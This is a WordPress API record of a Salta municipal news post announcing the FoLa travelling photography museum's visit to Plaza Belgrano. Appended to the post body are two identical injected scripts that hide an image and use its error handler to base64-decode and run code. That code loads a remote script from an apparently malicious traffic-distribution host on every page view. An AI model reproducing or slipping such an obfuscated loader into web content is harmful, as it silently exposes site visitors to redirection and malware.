{"id":1575,"date":"2022-10-08T00:43:26","date_gmt":"2022-10-08T03:43:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1575"},"modified":"2025-08-14T00:33:54","modified_gmt":"2025-08-14T03:33:54","slug":"el-municipio-invita-a-disfrutar-del-museo-itinerante-fototeca-latinoamericana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1575","title":{"rendered":"El municipio invita a disfrutar del Museo Itinerante Fototeca Latinoamericana"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#d80a3e\"><strong><em>El trailer se ubicar\u00e1 en Plaza Belgrano del 11 al 16 de octubre. Encontrar\u00e1n una muestra fotogr\u00e1fica con im\u00e1genes de fot\u00f3grafos salte\u00f1os y adem\u00e1s, realidad aumentada. Entrada libre y gratuita.<\/em><\/strong><\/h3>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, invita a disfrutar del Museo Itinerante Fototeca Latinoamericana (FoLa), que se desarrollar\u00e1 en la Plaza Belgrano con entrada libre y gratuita.<\/p>\n\n\n\n<p>El trailer de FoLa&nbsp; estar\u00e1 a disposici\u00f3n de salte\u00f1os y visitantes, desde el martes 11 hasta el domingo 16 de octubre. Se podr\u00e1 ingresar de lunes a s\u00e1bado de 11 a 13 y de 16 a 20 y el domingo&nbsp; de 11 a 13 .<\/p>\n\n\n\n<p>Para la exposici\u00f3n, fueron seleccionados los fot\u00f3grafos salte\u00f1os: Luis Rodr\u00edguez, Marco Pepa, Leonardo Villada, Isidoro Zang, Fabiana \u00c1vila, Karin Villagra, Luis Bravo, Leila Tolaba, Carlos Beriro, Elisabet Juri, Facundo Chiliguay, Patricio Barbar\u00e1n y Nicol\u00e1s Preci, como artistas invitados<\/p>\n\n\n\n<p>Tambi\u00e9n, habr\u00e1 una muestra de fotograf\u00eda y realidad aumentada desarrollada especialmente por los artistas Gian Paolo Minelli y Rafael Parra Toro que trabajaron en conjunto con la curadora Agustina Rinaldi, que cubrir\u00e1 el exterior del trailer y podr\u00e1 interactuar ,para lo cual s\u00f3lo es necesario un lector de c\u00f3digo QR.&nbsp;<\/p>\n\n\n\n<p>\u201cEn cada ciudad que visitamos, queremos que los vecinos se acerquen y participen de la propuesta, eso es lo que m\u00e1s nos gusta\u201d, afirma Gat\u00f3n Deleau, director y creador del proyecto.<\/p>\n\n\n\n<p><strong>Sobre el Museo Itinerante Fototeca Latinoamericana (FoLa)<\/strong><\/p>\n\n\n\n<p>Gast\u00f3n Deleau, cre\u00f3 el proyecto en 2016 y sum\u00f3 a la aventura a Marcos Bufano y Ana Pareta. El museo estuvo durante siete a\u00f1os en el Distrito Arcos.<\/p>\n\n\n\n<p>La Fototeca Latinoamericana por decisi\u00f3n de Deleau, su creador y director, encar\u00f3 el desaf\u00edo de reinventarse y adquiri\u00f3 el formato itinerante.<\/p>\n\n\n\n<p>Desde entonces la FoLa, recorre el pa\u00eds a bordo de un tr\u00e1iler de 8 metros por 2,50, convirti\u00e9ndose en el primer Museo Itinerante de Fotograf\u00eda, con acceso totalmente libre y gratuito para el p\u00fablico y lleva recorridos 3.000 kil\u00f3metros, 17 ciudades y tiene previstas otras 9 m\u00e1s para este 2022.<\/p>\n\n\n\n<p>Este camino, se complementa, con una biblioteca rodante, proyecci\u00f3n de documentales y diferentes espacios de charla y talleres que se concretan con los pobladores de cada ciudad.<\/p>\n\n\n\n<p>En el interior del tr\u00e1iler, los visitantes pueden apreciar fotograf\u00edas enmarcadas de 42 fot\u00f3grafos y fot\u00f3grafas reconocidos de nuestro pa\u00eds, a lo que se suma la proyecci\u00f3n de im\u00e1genes de entre 10 y 30 fot\u00f3grafos de cada ciudad que se visita.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/10\/trailer-fola-interior.jpg\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El trailer se ubicar\u00e1 en Plaza Belgrano del 11 al 16 de octubre. Encontrar\u00e1n una muestra fotogr\u00e1fica con im\u00e1genes de fot\u00f3grafos salte\u00f1os y adem\u00e1s, realidad aumentada. Entrada libre y gratuita. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, invita a disfrutar del Museo Itinerante Fototeca Latinoamericana (FoLa), que se desarrollar\u00e1 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1576,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1575","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1575"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1575"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1575\/revisions"}],"predecessor-version":[{"id":7328,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1575\/revisions\/7328"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1576"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}